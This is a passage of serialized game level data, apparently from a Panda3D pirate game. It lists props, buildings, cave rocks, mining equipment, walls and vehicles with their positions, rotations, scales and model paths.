0.0),'Pos': Point3(-87.065, 547.859, 27.13),'Scale': VBase3(2.225, 2.225, 2.225),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273621006.77akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(172.103, 603.323, 17.631),'Scale': VBase3(1.698, 1.698, 1.698),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273621011.42akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(-76.99, 0.0, 0.0),'Pos': Point3(223.179, 587.15, 25.194),'Scale': VBase3(2.424, 2.424, 2.424),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273621016.53akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(16.261, 0.0, 0.0),'Pos': Point3(235.774, 595.157, 25.159),'Scale': VBase3(2.155, 2.155, 2.155),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273621023.86akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(-24.529, 0.0, 0.0),'Pos': Point3(288.969, 646.145, 22.442),'Scale': VBase3(2.37, 2.37, 2.37),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273621031.13akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(-154.841, 0.0, 0.0),'Pos': Point3(302.898, 681.027, 18.051),'Scale': VBase3(1.812, 1.812, 1.812),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273622024.05akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273622024.05akelts0','Holiday': '','Hpr': VBase3(-156.462, 1.616, -0.945),'Objects': {'1273684027.48akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(266.934, 628.765, 24.002),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.162, -4.354, 0.599),'Scale': VBase3(1.0, 1.0, 1.0),'TargetUIDs': []}},'Pos': Point3(269.848, 625.636, 23.974),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseG_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273622193.64akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'Holiday': '','Hpr': VBase3(-156.729, 0.0, -2.774),'Objects': {},'Pos': Point3(163.692, -197.923, 57.709),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/tunnels/pir_m_are_tun_caveInterior_cap'}},'1273622246.2akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-120.926, 13.894, -4.981),'Pos': Point3(155.24, -202.555, 52.323),'RenderEffect': False,'Scale': VBase3(1.095, 1.095, 1.332),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_b'}},'1273622309.08akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(69.736, 0.0, 0.0),'Pos': Point3(168.909, -190.166, 53.535),'RenderEffect': False,'Scale': VBase3(0.899, 0.899, 0.899),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1273622343.75akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-118.636, 40.255, -131.12),'Pos': Point3(138.386, -211.711, 103.597),'RenderEffect': False,'Scale': VBase3(1.064, 1.064, 1.064),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1273622401.11akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(119.339, 0.0, 0.0),'Pos': Point3(170.54, -195.743, 55.088),'RenderEffect': False,'Scale': VBase3(0.548, 0.548, 0.548),'VisSize': '','Visual': {'Color': (0.30000001192092896, 0.30000001192092896, 0.30000001192092896, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_e'}},'1273678010.59akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(42.156, 1.873, 7.811),'Pos': Point3(142.544, -177.865, 53.948),'RenderEffect': False,'Scale': VBase3(3.236, 3.236, 3.937),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1273678061.25akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-100.476, -7.384, -6.552),'Pos': Point3(176.789, -175.976, 50.648),'RenderEffect': False,'Scale': VBase3(3.236, 3.236, 3.937),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}},'1273684589.5akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-169.018, 0.0, 0.0),'Pos': Point3(-388.282, 98.411, 64.884),'RenderEffect': False,'Scale': VBase3(0.511, 0.511, 0.511),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273684622.66akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(142.911, 5.813, 0.0),'Pos': Point3(-474.118, 449.934, 39.992),'RenderEffect': False,'Scale': VBase3(2.5, 2.5, 2.5),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_f'}},'1273684653.06akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-3.679, -0.902, 0.851),'Pos': Point3(-430.645, 111.888, 67.638),'RenderEffect': False,'Scale': VBase3(3.183, 3.183, 1.326),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1273684715.98akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-135.237, 6.411, -1.008),'Pos': Point3(-660.959, 118.033, 60.851),'RenderEffect': False,'Scale': VBase3(3.382, 3.382, 3.382),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273684786.02akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-108.287, -0.218, -3.118),'Pos': Point3(-272.423, -108.126, 106.332),'RenderEffect': False,'Scale': VBase3(3.921, 3.921, 4.528),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273686000.47akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-180.0, -82.688, 180.0),'Pos': Point3(225.542, 593.944, 26.324),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_mng_cartEmpty'}},'1273686056.8akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-104.037, 81.994, -19.397),'Pos': Point3(221.448, 596.21, 24.218),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Model': 'models/props/pir_m_prp_mng_shovel'}},'1273686095.08akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(221.485, 594.507, 24.589),'Scale': VBase3(0.83, 0.83, 0.83),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_mng_rusty_bucket'}},'1273686115.81akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(31.601, 87.74, -31.551),'Pos': Point3(231.613, 584.746, 24.809),'Scale': VBase3(1.529, 1.529, 1.529),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_mng_wheel'}},'1273686182.59akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-117.938, 5.804, -0.914),'Objects': {'1273685989.81akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(213.256, 596.251, 24.747),'Holiday': '','Hpr': VBase3(89.635, -0.042, 0.068),'Pos': Point3(-0.024, -2.586, 0.302),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_mng_cart'}},'1273686376.13akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(210.947, 594.813, 24.755),'Holiday': '','Hpr': VBase3(90.626, 0.073, -2.764),'Pos': Point3(2.317, -3.967, 0.411),'Scale': VBase3(0.14, 0.14, 0.14),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_mng_supportBeam_single'}},'1273706136.45akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(111.692, 632.573, 16.426),'Holiday': '','Hpr': VBase3(-159.017, 2.145, -0.868),'Objects': {'1273706558.84akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(112.101, 633.574, 16.512),'Holiday': '','Hpr': VBase3(177.68, 0.7, 0.348),'Objects': {'1273706558.94akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(1.469, 637.047, 13.08),'Holiday': '','Hpr': VBase3(-159.007, 2.803, -0.868),'Objects': {'1273706569.48akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(1.517, 637.094, 13.187),'Holiday': '','Hpr': VBase3(177.17, -2.944, -0.343),'Objects': {'1273706569.45akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(-41.35, 630.56, 15.261),'Holiday': '','Hpr': VBase3(0.0, -1.047, 0.0),'Objects': {'1273706569.66akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(-147.433, 596.475, 24.713),'Holiday': '','Hpr': VBase3(-159.039, 0.659, -0.867),'Objects': {},'Pos': Point3(14.5, -109.814, 0.83),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_curve'}}},'Pos': Point3(0.0, -43.412, 0.002),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_straight'}}},'Pos': Point3(0.033, -0.057, 0.109),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_straight'}}},'Pos': Point3(14.509, -109.735, 3.31),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_curve'}}},'Pos': Point3(0.033, -0.052, 0.115),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_straight'}}},'Pos': Point3(14.509, -109.765, 2.571),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_curve'}}},'Pos': Point3(215.554, 595.027, 24.708),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_straight'}},'1273686245.88akelts': {'Type': 'Cave_Props','DisableCollision': True,'GridPos': Point3(190.428, 597.402, 14.708),'Holiday': '','Hpr': VBase3(96.594, 1.188, 9.44),'Pos': Point3(190.171, 593.354, 15.198),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.316),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_g'}},'1273686464.41akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-27.091, -3.642, -1.861),'Pos': Point3(227.858, 599.531, 24.733),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/pir_m_prp_mng_pickAxe'}},'1273686476.69akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(124.326, -1.479, 3.384),'Pos': Point3(219.789, 596.027, 24.46),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_mng_pickAxe'}},'1273686478.88akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-132.787, 2.78, -3.0),'Pos': Point3(238.042, 601.53, 24.69),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_mng_pickAxe'}},'1273686480.44akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(66.027, -2.762, 3.737),'Pos': Point3(247.303, 621.098, 23.165),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_mng_pickAxe'}},'1273686539.75akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-59.758, 68.327, -42.545),'Pos': Point3(243.925, 614.423, 23.263),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Model': 'models/props/pir_m_prp_mng_shovel'}},'1273686561.13akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-172.915, 9.497, 0.126),'Pos': Point3(255.179, 636.619, 21.621),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/pir_m_prp_mng_shovel'}},'1273686833.66akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(-25.301, 0.0, -6.454),'Pos': Point3(-277.603, 484.462, 39.752),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273686885.94akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(46.695, -6.141, 1.797),'Pos': Point3(-291.045, 469.908, 40.379),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20_burned'}},'1273686958.42akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273686958.42akelts0','Holiday': '','Hpr': VBase3(138.518, 0.0, 0.0),'Pos': Point3(-297.131, 462.941, 41.13),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_woods','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273687006.28akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273687006.28akelts0','Holiday': '','Hpr': VBase3(-38.711, -1.48, 0.0),'Pos': Point3(-318.596, 434.153, 43.182),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_woods','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273687055.81akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(-100.155, 4.165, -4.86),'Pos': Point3(-322.832, 427.713, 43.388),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273687099.22akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-106.286, -0.163, -0.179),'Pos': Point3(-293.979, 464.42, 41.084),'Scale': VBase3(0.411, 0.411, 0.411),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273687160.83akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(-11.646, 0.0, -10.532),'Pos': Point3(-210.559, 447.661, 52.937),'Scale': VBase3(1.443, 1.443, 1.443),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273687224.78akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(66.782, -0.836, 5.727),'Pos': Point3(-574.146, 361.781, 52.602),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20_burned'}},'1273687265.03akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(95.732, -2.351, 1.61),'Pos': Point3(-599.555, 290.817, 62.925),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273687287.48akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(71.697, -3.341, 4.575),'Pos': Point3(-601.474, 310.446, 61.667),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20_burned'}},'1273687397.27akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(54.183, -3.28, 8.798),'Pos': Point3(-595.101, 329.416, 60.01),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273687424.47akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(60.939, -1.983, 9.631),'Pos': Point3(-583.728, 344.773, 55.897),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273687605.47akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(134.56, 2.875, 1.229),'Pos': Point3(-258.023, -283.022, 114.403),'RenderEffect': False,'Scale': VBase3(4.469, 4.469, 5.16),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273687762.78akelts': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(32.613, 0.0, 0.0),'Pos': Point3(-498.712, 21.793, 75.79),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.45, 0.4, 0.4, 1.0),'Model': 'models/props/pir_m_prp_cem_headstones_b'}},'1273701053.88akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-14.924, 0.0, 4.703),'Pos': Point3(-24.692, -43.474, 95.407),'RenderEffect': False,'Scale': VBase3(1.754, 1.754, 1.754),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}},'1273702563.27akelts': {'Type': 'Fountain','DisableCollision': True,'Holiday': '','Hpr': VBase3(-28.92, 0.459, 0.0),'Pos': Point3(-476.172, 57.564, 74.607),'Scale': VBase3(0.553, 0.553, 0.553),'VisSize': '','Visual': {'Color': (0.4, 0.45, 0.4, 1.0),'Model': 'models/props/spanishtown_fountain'}},'1273702749.44akelts': {'Type': 'Shanty Tents','Hpr': VBase3(156.204, 0.0, 0.0),'Pos': Point3(-334.917, 189.754, 66.709),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_tnt_group3_burned'}},'1273702780.16akelts': {'Type': 'Shanty Tents','Hpr': VBase3(28.713, 0.0, 0.0),'Pos': Point3(-319.735, 87.811, 64.379),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_tnt_group3_burned'}},'1273702826.28akelts': {'Type': 'Shanty Tents','Hpr': VBase3(-110.134, 0.0, 0.0),'Pos': Point3(-402.083, 203.322, 66.709),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_tnt_single_burned'}},'1273702880.47akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273702880.47akelts0','Holiday': '','Hpr': VBase3(-112.635, -3.781, -3.745),'Pos': Point3(-225.914, -259.289, 112.427),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_house','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273702950.36akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.181, 0.0, -3.835),'Pos': Point3(-300.56, 171.07, 64.25),'RenderEffect': False,'Scale': VBase3(3.183, 3.183, 3.183),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1273703038.08akelts': {'Type': 'Well','DisableCollision': False,'Holiday': '','Hpr': VBase3(70.933, 0.0, 0.0),'Pos': Point3(-436.71, 127.503, 68.513),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/wellA'}},'1273858743.94akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(176.269, 0.0, 0.0),'Pos': Point3(-403.426, 104.394, 67.949),'RenderEffect': False,'Scale': VBase3(1.723, 1.723, 1.723),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_f'}},'1273858797.39akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273858797.39akelts0','Holiday': '','Hpr': VBase3(-47.748, -8.792, -1.392),'Pos': Point3(-562.966, 383.311, 49.796),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_woods','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273858851.44akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(66.136, 53.323, 51.859),'Pos': Point3(-552.776, 388.505, 38.734),'RenderEffect': False,'Scale': VBase3(1.297, 1.297, 1.297),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_tall'}},'1273858987.22akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(31.095, -0.746, 0.693),'Pos': Point3(-212.821, 774.071, -3.55),'RenderEffect': False,'Scale': VBase3(7.541, 7.541, 7.541),'VisSize': '','Visual': {'Color': (0.7, 1.0, 0.964, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_f'}},'1273859048.28akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(73.304, 9.28, 5.988),'Pos': Point3(-800.584, 95.651, -1.557),'RenderEffect': False,'Scale': VBase3(1.229, 1.229, 1.229),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1273859133.81akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(32.595, -3.915, 0.217),'Pos': Point3(-520.421, 408.404, 44.525),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273859164.74akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(15.872, -3.812, -0.918),'Pos': Point3(-503.415, 419.347, 44.34),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273859174.89akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(35.219, -3.901, 4.806),'Pos': Point3(-484.317, 424.862, 44.597),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273859206.33akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(62.237, -1.287, 11.837),'Pos': Point3(-467.986, 436.288, 43.03),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1274118830.34akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(62.237, -1.287, 11.837),'Pos': Point3(-458.958, 453.09, 38.932),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_woodPost'}},'1274118881.0akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(-100.155, 4.165, -4.86),'Pos': Point3(-326.48, 408.027, 45.226),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_woodPost'}},'1274122002.33akelts': {'Type': 'Dinghy','Aggro Radius': '20.0000','Hpr': VBase3(123.755, 0.0, 0.0),'Location': 'Water','Pos': Point3(-797.07, 19.959, -0.393),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/shipparts/dingy-geometry_High'}},'1274122131.17akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(213.256, 596.251, 24.747),'Holiday': '','Hpr': VBase3(8.662, -0.074, -0.031),'Pos': Point3(1.191, 637.046, 13.473),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_mng_cartEmpty'}},'1274136366.05akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-155.538, 0.0, 0.0),'Pos': Point3(261.866, 599.52, 213.495),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_mng_elevator_basket'}},'1274136840.84akelts': {'Type': 'Crate','DisableCollision': False,'Holiday': '','Hpr': VBase3(24.33, 0.0, 0.0),'Pos': Point3(255.091, 623.539, 23.168),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Model': 'models/props/crate'}},'1274136872.56akelts': {'Type': 'Crate','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-411.1, 115.72, 67.91),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/crate'}},'1274137485.25akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(112.039, 0.0, 0.0),'Pos': Point3(241.098, 607.806, 24.142),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_mng_elevator_basket'}},'1274137802.23akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-155.538, 0.0, 0.0),'Pos': Point3(261.866, 599.52, 213.495),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_mng_elevator_top'}},'1274195453.61akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-58.904, 7.94, -8.183),'Pos': Point3(-342.922, -330.634, 121.628),'RenderEffect': False,'Scale': VBase3(2.721, 2.721, 3.141),'VisSize': '','Visual': {'Color': (0.416, 0.469, 0.548, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1274195538.28akelts': {'Type': 'Crane','DisableCollision': False,'Holiday': '','Hpr': VBase3(131.644, 0.0, 0.0),'Pos': Point3(282.147, 459.249, 202.504),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 